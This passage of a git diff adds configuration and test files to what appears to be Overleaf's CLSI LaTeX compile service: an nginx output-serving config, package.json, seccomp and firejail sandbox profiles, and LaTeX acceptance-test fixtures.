+          image: gcr.io/henry-terraform-admin/clsi
+          imagePullPolicy: Always
+          readinessProbe:
+            httpGet:
+              path: /status
+              port: 80
+            periodSeconds: 5
+            initialDelaySeconds: 0
+            failureThreshold: 3
+            successThreshold: 1
+
+
+
diff --git a/services/clsi/nginx.conf b/services/clsi/nginx.conf
new file mode 100644
index 0000000..604eb93
--- /dev/null
+++ b/services/clsi/nginx.conf
@@ -0,0 +1,117 @@
+# keep in sync with clsi-startup.sh files
+# keep in sync with server-ce/nginx/clsi-nginx.conf
+# Changes to the above:
+# - added debug header
+
+server {
+  # Extra header for dev-env.
+ add_header 'X-Served-By' 'clsi-nginx' always; + + listen 8080; + server_name clsi-proxy; + server_tokens off; + access_log off; + # Ignore symlinks possibly created by users + disable_symlinks on; + # enable compression for tex auxiliary files, but not for pdf files + gzip on; + gzip_types text/plain; + gzip_proxied any; + types { + text/plain log blg aux stdout stderr; + application/pdf pdf; + } + + # user content domain access check + # The project-id is zero prefixed. No actual user project uses these ids. + # mongo-id 000000000000000000000000 -> 1970-01-01T00:00:00.000Z + # mongo-id 000000010000000000000000 -> 1970-01-01T00:00:01.000Z + # mongo-id 100000000000000000000000 -> 1978-07-04T21:24:16.000Z + # This allows us to distinguish between check-traffic and regular output traffic. + location ~ ^/project/0([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.pdf$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /var/clsi/tiny.pdf; + } + location ~ ^/project/0([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.pdf$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /var/clsi/tiny.pdf; + } + + # handle output files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1-$2/generated-files/$3/output.$4; + } + # handle .blg files for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1-$2/generated-files/$3/$4.blg; + } + # handle output files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/output\.([a-z.]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1/generated-files/$2/output.$3; + } + # handle .blg files for anonymous users + location ~ ^/project/([0-9a-f]+)/build/([0-9a-f-]+)/output/(.+)\.blg$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + alias /output/$1/generated-files/$2/$3.blg; + } + + # PDF range for specific users + location ~ ^/project/([0-9a-f]+)/user/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + # Cache for one day + expires 1d; + alias /output/$1-$2/content/$3; + } + # PDF range for anonymous users + location ~ ^/project/([0-9a-f]+)/content/([0-9a-f-]+/[0-9a-f]+)$ { + if ($request_method = 'OPTIONS') { + # handle OPTIONS method for CORS requests + add_header 'Allow' 'GET,HEAD'; + return 204; + } + # Cache for one day + expires 1d; + alias /output/$1/content/$2; + } + + # status endpoint for haproxy httpchk option + location /status { + return 200; + } + + # load shedding probe + location = /instance-state { + alias /var/clsi/instance-state; + } +} diff --git a/services/clsi/package.json b/services/clsi/package.json new file mode 100644 index 0000000..86566e0 --- /dev/null +++ b/services/clsi/package.json @@ -0,0 +1,52 @@ +{ 
+ "name": "@overleaf/clsi", + "description": "A Node.js implementation of the CLSI LaTeX web-API", + "private": true, + "main": "app.js", + "scripts": { + "start": "node app.js", + "test:acceptance:_run": "mocha --recursive --reporter spec --timeout 15000 --exit $@ test/acceptance/js", + "test:acceptance": "npm run test:acceptance:_run -- --grep=$MOCHA_GREP", + "test:unit:_run": "mocha --recursive --reporter spec $@ test/unit/js", + "test:unit": "npm run test:unit:_run -- --grep=$MOCHA_GREP", + "nodemon": "node --watch app.js", + "lint": "eslint --max-warnings 0 --format unix .", + "format": "prettier --list-different $PWD/'**/*.*js'", + "format:fix": "prettier --write $PWD/'**/*.*js'", + "lint:fix": "eslint --fix .", + "types:check": "tsc --noEmit" + }, + "dependencies": { + "@overleaf/fetch-utils": "*", + "@overleaf/logger": "*", + "@overleaf/metrics": "*", + "@overleaf/o-error": "*", + "@overleaf/promise-utils": "*", + "@overleaf/settings": "*", + "archiver": "5.3.2", + "async": "^3.2.5", + "body-parser": "^1.20.3", + "bunyan": "^1.8.15", + "dockerode": "^4.0.5", + "express": "^4.21.2", + "lodash": "^4.17.21", + "p-limit": "^3.1.0", + "request": "^2.88.2", + "send": "^0.19.0", + "tar-fs": "^3.0.4", + "workerpool": "^6.1.5" + }, + "devDependencies": { + "@types/workerpool": "^6.1.0", + "chai": "^4.3.6", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "mock-fs": "^5.1.2", + "node-fetch": "^2.7.0", + "sandboxed-module": "^2.0.4", + "sinon": "~9.0.1", + "sinon-chai": "^3.7.0", + "timekeeper": "2.2.0", + "typescript": "^5.0.4" + } +} diff --git a/services/clsi/patch-texlive-dockerfile b/services/clsi/patch-texlive-dockerfile new file mode 100644 index 0000000..61cb796 --- /dev/null +++ b/services/clsi/patch-texlive-dockerfile @@ -0,0 +1,3 @@ +FROM quay.io/sharelatex/texlive-full:2017.1 + +# RUN usermod -u 1001 tex diff --git a/services/clsi/scripts/demo-pdfjs-Xref.js b/services/clsi/scripts/demo-pdfjs-Xref.js new file mode 100644 index 0000000..1f55c57 --- /dev/null +++ b/services/clsi/scripts/demo-pdfjs-Xref.js @@ -0,0 +1,12 @@ +const fs = require('node:fs') +const { parseXrefTable } = require('../app/lib/pdfjs/parseXrefTable') + +const pdfPath = process.argv[2] + +async function main() { + const size = (await fs.promises.stat(pdfPath)).size + const { xRefEntries } = await parseXrefTable(pdfPath, size) + console.log('Xref entries', xRefEntries) +} + +main().catch(console.error) diff --git a/services/clsi/seccomp/clsi-profile.json b/services/clsi/seccomp/clsi-profile.json new file mode 100644 index 0000000..084354b --- /dev/null +++ b/services/clsi/seccomp/clsi-profile.json @@ -0,0 +1,841 @@ +{ + "defaultAction": "SCMP_ACT_ERRNO", + "architectures": [ + "SCMP_ARCH_X86_64", + "SCMP_ARCH_X86", + "SCMP_ARCH_X32" + ], + "syscalls": [ + { + "name": "getrandom", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "access", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "arch_prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "brk", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_getres", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clock_nanosleep", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 
2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + }, + { + "name": "close", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "copy_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "creat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "dup3", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execve", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "execveat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "exit_group", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "faccessat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fadvise64_64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fallocate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmod", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchmodat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fcntl64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fdatasync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fstatfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fsync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ftruncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futex", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "futimesat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcpu", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getcwd", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getdents64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getegid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "geteuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpgrp", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getppid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getpriority", + 
"action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresgid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getresuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrlimit", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "get_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getrusage", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getsid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "getuid32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "ioctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "kill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "_llseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lseek", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "lstat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "madvise", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mkdirat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mmap2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mprotect", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "mremap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "munmap", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "newfstatat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "open", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "openat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pause", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pipe2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "preadv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "prlimit64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwrite64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pwritev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "read", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "readv", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rename", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "renameat2", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "restart_syscall", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rmdir", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigaction", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigpending", + "action": "SCMP_ACT_ALLOW", + 
"args": [] + }, + { + "name": "rt_sigprocmask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigreturn", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigsuspend", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_sigtimedwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "rt_tgsigqueueinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getaffinity", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getparam", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_max", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_get_priority_min", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_getscheduler", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_rr_get_interval", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sched_yield", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sendfile64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgroups32", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_robust_list", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "set_tid_address", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sigaltstack", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "stat64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "statfs64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sync_file_range", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "syncfs", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "sysinfo", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tgkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_create", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_delete", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_getoverrun", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_gettime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "timer_settime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "times", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "tkill", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "truncate64", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "umask", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "uname", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlink", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "unlinkat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utime", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimensat", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "utimes", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "vfork", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + 
"name": "vhangup", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "wait4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "write", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "pread", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setgid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "setuid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capget", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "capset", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "fchown", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "gettimeofday", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, { + "name": "epoll_pwait", + "action": "SCMP_ACT_ALLOW", + "args": [] + } + ] +} \ No newline at end of file diff --git a/services/clsi/synctex.profile b/services/clsi/synctex.profile new file mode 100644 index 0000000..577a901 --- /dev/null +++ b/services/clsi/synctex.profile @@ -0,0 +1,34 @@ +include /etc/firejail/disable-common.inc +include /etc/firejail/disable-devel.inc +# include /etc/firejail/disable-mgmt.inc ## removed in 0.9.40 +# include /etc/firejail/disable-secret.inc ## removed in 0.9.40 + +read-only /bin +blacklist /boot +blacklist /dev +read-only /etc +blacklist /home # blacklisted for synctex +read-only /lib +read-only /lib64 +blacklist /media +blacklist /mnt +blacklist /opt +blacklist /root +read-only /run +blacklist /sbin +blacklist /selinux +blacklist /src +blacklist /sys +read-only /usr + +caps.drop all +noroot +nogroups +net none +private-tmp +private-dev +shell none +seccomp +nonewprivs + + diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex b/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex new file mode 100644 index 0000000..910cef5 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/asymptote/main.tex @@ -0,0 +1,117 @@ +\documentclass[12pt]{article} + +% Use this form to include EPS (latex) or PDF (pdflatex) files: +\usepackage{asymptote} + +% Use this form with latex or pdflatex to include inline LaTeX code by default: +%\usepackage[inline]{asymptote} + +% Use this form with latex or pdflatex to create PDF attachments by default: +%\usepackage[attach]{asymptote} + +% Enable this line to support the attach option: +%\usepackage[dvips]{attachfile2} + +\begin{document} + +% Optional subdirectory for asy files (no spaces): +\def\asydir{} + +\begin{asydef} +// Global Asymptote definitions can be put here. +import three; +usepackage("bm"); +texpreamble("\def\V#1{\bm{#1}}"); +// One can globally override the default toolbar settings here: +// settings.toolbar=true; +\end{asydef} + +Here is a venn diagram produced with Asymptote, drawn to width 4cm: + +\def\A{A} +\def\B{\V{B}} + +%\begin{figure} +\begin{center} +\begin{asy} +size(4cm,0); +pen colour1=red; +pen colour2=green; + +pair z0=(0,0); +pair z1=(-1,0); +pair z2=(1,0); +real r=1.5; +path c1=circle(z1,r); +path c2=circle(z2,r); +fill(c1,colour1); +fill(c2,colour2); + +picture intersection=new picture; +fill(intersection,c1,colour1+colour2); +clip(intersection,c2); + +add(intersection); + +draw(c1); +draw(c2); + +//draw("$\A$",box,z1); // Requires [inline] package option. +//draw(Label("$\B$","$B$"),box,z2); // Requires [inline] package option. 
+draw("$A$",box,z1); +draw("$\V{B}$",box,z2); + +pair z=(0,-2); +real m=3; +margin BigMargin=Margin(0,m*dot(unit(z1-z),unit(z0-z))); + +draw(Label("$A\cap B$",0),conj(z)--z0,Arrow,BigMargin); +draw(Label("$A\cup B$",0),z--z0,Arrow,BigMargin); +draw(z--z1,Arrow,Margin(0,m)); +draw(z--z2,Arrow,Margin(0,m)); + +shipout(bbox(0.25cm)); +\end{asy} +%\caption{Venn diagram}\label{venn} +\end{center} +%\end{figure} + +Each graph is drawn in its own environment. One can specify the width +and height to \LaTeX\ explicitly. This 3D example can be viewed +interactively either with Adobe Reader or Asymptote's fast OpenGL-based +renderer. To support {\tt latexmk}, 3D figures should specify +\verb+inline=true+. It is sometimes desirable to embed 3D files as annotated +attachments; this requires the \verb+attach=true+ option as well as the +\verb+attachfile2+ \LaTeX\ package. +\begin{center} +\begin{asy}[height=4cm,inline=true,attach=false,viewportwidth=\linewidth] +currentprojection=orthographic(5,4,2); +draw(unitcube,blue); +label("$V-E+F=2$",(0,1,0.5),3Y,blue+fontsize(17pt)); +\end{asy} +\end{center} + +One can also scale the figure to the full line width: +\begin{center} +\begin{asy}[width=\the\linewidth,inline=true] +pair z0=(0,0); +pair z1=(2,0); +pair z2=(5,0); +pair zf=z1+0.75*(z2-z1); + +draw(z1--z2); +dot(z1,red+0.15cm); +dot(z2,darkgreen+0.3cm); +label("$m$",z1,1.2N,red); +label("$M$",z2,1.5N,darkgreen); +label("$\hat{\ }$",zf,0.2*S,fontsize(24pt)+blue); + +pair s=-0.2*I; +draw("$x$",z0+s--z1+s,N,red,Arrows,Bars,PenMargins); +s=-0.5*I; +draw("$\bar{x}$",z0+s--zf+s,blue,Arrows,Bars,PenMargins); +s=-0.95*I; +draw("$X$",z0+s--z2+s,darkgreen,Arrows,Bars,PenMargins); +\end{asy} +\end{center} +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf new file mode 100644 index 0000000..0b85562 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref new file mode 100644 index 0000000..de34f56 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/asymptote/output.pdfxref @@ -0,0 +1,81 @@ +1/0: uncompressed; offset = 123103 +2/0: uncompressed; offset = 123422 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 1084 +6/0: uncompressed; offset = 1244 +7/0: uncompressed; offset = 4001 +8/0: uncompressed; offset = 4155 +9/0: uncompressed; offset = 4297 +10/0: uncompressed; offset = 4933 +11/0: uncompressed; offset = 5309 +12/0: uncompressed; offset = 5498 +13/0: uncompressed; offset = 30250 +14/0: uncompressed; offset = 31471 +15/0: uncompressed; offset = 38404 +16/0: uncompressed; offset = 39046 +17/0: uncompressed; offset = 40166 +18/0: uncompressed; offset = 40906 +19/0: uncompressed; offset = 65560 +20/0: uncompressed; offset = 74702 +21/0: uncompressed; offset = 81705 +22/0: uncompressed; offset = 97182 +23/0: uncompressed; offset = 104117 +24/0: uncompressed; offset = 111195 +25/0: uncompressed; offset = 118571 +26/0: compressed; stream = 6, index = 0 +27/0: compressed; stream = 6, index = 1 +28/0: compressed; stream = 6, index = 2 +29/0: compressed; stream = 6, index = 3 +30/0: compressed; stream = 6, index = 4 +31/0: compressed; stream = 6, index = 5 +32/0: compressed; stream = 6, index = 6 +33/0: compressed; stream = 6, index = 7 
+34/0: compressed; stream = 6, index = 8 +35/0: compressed; stream = 6, index = 9 +36/0: compressed; stream = 6, index = 10 +37/0: compressed; stream = 6, index = 11 +38/0: compressed; stream = 6, index = 12 +39/0: compressed; stream = 6, index = 13 +40/0: compressed; stream = 6, index = 14 +41/0: compressed; stream = 6, index = 15 +42/0: compressed; stream = 6, index = 16 +43/0: compressed; stream = 6, index = 17 +44/0: compressed; stream = 6, index = 18 +45/0: compressed; stream = 6, index = 19 +46/0: compressed; stream = 6, index = 20 +47/0: compressed; stream = 6, index = 21 +48/0: compressed; stream = 6, index = 22 +49/0: compressed; stream = 6, index = 23 +50/0: compressed; stream = 6, index = 24 +51/0: compressed; stream = 6, index = 25 +52/0: compressed; stream = 6, index = 26 +53/0: compressed; stream = 6, index = 27 +54/0: compressed; stream = 6, index = 28 +55/0: compressed; stream = 6, index = 29 +56/0: compressed; stream = 6, index = 30 +57/0: compressed; stream = 6, index = 31 +58/0: compressed; stream = 6, index = 32 +59/0: compressed; stream = 6, index = 33 +60/0: compressed; stream = 6, index = 34 +61/0: compressed; stream = 6, index = 35 +62/0: compressed; stream = 6, index = 36 +63/0: compressed; stream = 6, index = 37 +64/0: compressed; stream = 6, index = 38 +65/0: compressed; stream = 6, index = 39 +66/0: compressed; stream = 6, index = 40 +67/0: compressed; stream = 6, index = 41 +68/0: compressed; stream = 6, index = 42 +69/0: compressed; stream = 6, index = 43 +70/0: compressed; stream = 6, index = 44 +71/0: compressed; stream = 6, index = 45 +72/0: compressed; stream = 6, index = 46 +73/0: compressed; stream = 6, index = 47 +74/0: compressed; stream = 6, index = 48 +75/0: compressed; stream = 6, index = 49 +76/0: compressed; stream = 6, index = 50 +77/0: compressed; stream = 6, index = 51 +78/0: compressed; stream = 6, index = 52 +79/0: compressed; stream = 6, index = 53 +80/0: compressed; stream = 6, index = 54 +81/0: compressed; stream = 6, index = 55 diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib new file mode 100644 index 0000000..5e796e0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/bibliography.bib @@ -0,0 +1,9 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex new file mode 100644 index 0000000..2f032d6 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage[backend=biber]{biblatex} +\addbibresource{bibliography.bib} + +\begin{document} + +The meaning of life, the universe and everything is 42 \cite{DouglasAdams} + +\printbibliography + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl new file mode 100644 index 0000000..48e803b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/biber_bibliography/output.bbl @@ -0,0 +1,48 